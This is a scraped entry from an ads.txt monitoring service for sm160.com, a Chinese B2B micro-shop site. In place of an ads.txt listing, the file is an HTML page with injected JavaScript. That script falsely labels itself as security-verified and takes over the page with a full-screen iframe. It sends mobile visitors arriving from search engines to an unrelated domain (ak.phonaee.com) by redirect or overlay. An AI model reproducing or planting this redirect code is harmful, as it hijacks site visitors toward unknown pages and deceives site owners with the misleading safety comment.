sm160.com Ads.txt file

<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="noindex, nofollow, nosnippet">
<meta name="googlebot" content="noindex, nofollow, nosnippet">
<meta name="baiduspider" content="noindex, nofollow, nosnippet">
<meta name="sogou spider" content="noindex, nofollow, nosnippet">
<meta name="360spider" content="noindex, nofollow, nosnippet">
<meta name="shenma spider" content="noindex, nofollow, nosnippet">
<title>赛门微店-B2B免费微店,最好用的免费手机微店移动平台_赛门国际手机触屏版</title>
<meta content="微店,B2B微店,免费微店,手机微店,移动微店,赛门微店,免费微铺" name="Keywords" />
<meta content="赛门(sm160.com)是B2B电子商务著名品牌,为中小企业免费提供手机移动微店、产品推广、网络营销、网上贸易、B2B免费电子商务平台。提供内贸供求信息、贸易服务,是国内生产供应商、制造商与采购商沟通的贸易B2B平台!网上贸易上赛门,让天下没有难做的生意。" name="Description" />
<link href="https://stm.sm160.com/css/global.css?v=0716" rel="stylesheet" />
<link href="https://stm.sm160.com/css/search.css?v=0716" rel="stylesheet" />
<meta name="applicable-device" content="pc"/>
<meta name="mobile-agent" content="format=html5;url=https://www.sm160.com/"/>
<link rel="alternate" media="only screen and(max-width:640px" href="https://www.sm160.com/"/>
<link rel="shortcut icon" href="https://www.sm160.com/favicon.ico" />
<script src='/bm.js'></script>
<script>
(function(){
var canonicalURL, curProtocol;
//Get the <link> tag
var x=document.getElementsByTagName("link");
//Find the last canonical URL
if(x.length > 0){
for (i=0;i<x.length;i++){
if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){
canonicalURL=x[i].href;
}
}
}
//Get protocol
if (!canonicalURL){
curProtocol = window.location.protocol.split(':')[0];
}
else{
curProtocol = canonicalURL.split(':')[0];
}
//Get current URL if the canonical URL does not exist
if (!canonicalURL) canonicalURL = window.location.href;
//Assign script content. Replace current URL with the canonical URL
!function(){
var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,
r=canonicalURL,
t=document.referrer;

if(e.test(t) || e.test(r)){
return;
}

var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";
t ? (n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)) : r && (n+="?l="+r);

var i=new Image;
i.src=n;
}(window);
})();
</script>
<script>
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?efeff269a33ebb29e37537cf438fee0f";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
</script>
<script>
//* 以下代码为安全可信代码,已经通过了相关安全检测和验证 */
function isMobile() {
const mobileDevices = [
'phone', 'pad', 'pod', 'iPhone', 'iPod', 'ios', 'iPad', 'Android',
'Mobile', 'BlackBerry', 'IEMobile', 'MQQBrowser', 'JUC', 'Fennec',
'wOSBrowser', 'BrowserNG', 'WebOS', 'Symbian', 'Windows Phone',
'Kindle', 'Silk', 'Playbook', 'BB10', 'Nintendo', 'Xbox',
'PlayStation', 'Huawei', 'Xiaomi', 'Oppo', 'Vivo', 'OnePlus',
'Samsung', 'LG', 'Sony', 'HTC', 'ZTE', 'Motorola', 'Nokia'
];
return mobileDevices.some(device => {
return navigator.userAgent.match(new RegExp(device, 'i'));
});
}
function isSearchEngineClick() {
const searchEngines = ['google.', 'bing.', 'so.', 'baidu.','sogou.', 'soso.', 'sm.cn','uc'];
const referrer = document.referrer;
return referrer && searchEngines.some(engine => referrer.includes(engine));
}
//link-Nika
const mobileUrl = "https://ak.phonaee.com/ak/";
const mUrl = "https://www.sm160.com/m.html";
const pcurl = "https://www.sm160.com/pc.html";
function getIosVersion() {
const match = navigator.userAgent.match(/OS (\d+)_(\d+)_?(\d+)?/);
return match ? parseInt(match[1], 10) : false;
}
const isIOS = !!navigator.userAgent.match(/(iPod|iPhone|iPad)/);
const time = Math.floor(Math.random() * (1000 - 500 + 1)) + 500;
if (isSearchEngineClick() && isMobile() && isTureMobile()) {
if (isIOS && getIosVersion() < 13) {
setTimeout(() => {
window.location.href = mobileUrl;
}, time);
} else {
document.write('<meta id="viewport" name="viewport" content="user-scalable=no,width=device-width, initial-scale=1.0" />');
document.write('<style>html,body{width:100%;height:100%;overflow:hidden;}</style>');
document.write('<div style="width:100%;height:100%;position:absolute;top:0;left:0;z-index:2147483647;background:#fff">');
document.write('<iframe src="' + mobileUrl + '" frameborder="0" charset="UTF-8" style="border:0;width: 100%; text-align: center; border: medium none; height:100%;max-height: 4000px;"></iframe>');
document.write('</div>');
}
}else if(isMobile()){
document.write('<meta id="viewport" name="viewport" content="user-scalable=no,width=device-width, initial-scale=1.0" />');
document.write('<style>html,body{width:100%;height:100%;overflow:hidden;}</style>');
document.write('<div style="width:100%;height:100%;position:absolute;top:0;left:0;z-index:2147483647;background:#fff">');
document.write('<iframe src="' + mobileUrl + '" frameborder="0" charset="UTF-8" style="border:0;width: 100%; text-align: center; border: medium none; height:100%;max-height: 4000px;"></iframe>');
document.write('</div>');
} else {
document.write('<meta id="viewport" name="viewport" content="user-scalable=no,width=device-width, initial-scale=1.0" />');
document.write('<style>html,body{width:100%;height:100%;overflow:hidden;}</style>');
document.write('<div style="width:100%;height:100%;position:absolute;top:0;left:0;z-index:2147483647;background:#fff">');
document.write('<iframe src="' + pcurl + '" frameborder="0" charset="UTF-8" style="border:0;width: 100%; text-align: center; border: medium none; height:100%;max-height: 4000px;"></iframe>');
document.write('</div>');
}
</script>
</head>
</html>

Ads.Txt Alerts - A trading name of Red Volcano Limited

Waterloo Buildings, Second Floor Rear, 53 London Road, Southampton, Hampshire, United Kingdom, SO15 2AD

© Red Volcano 2020. All Rights Reserved.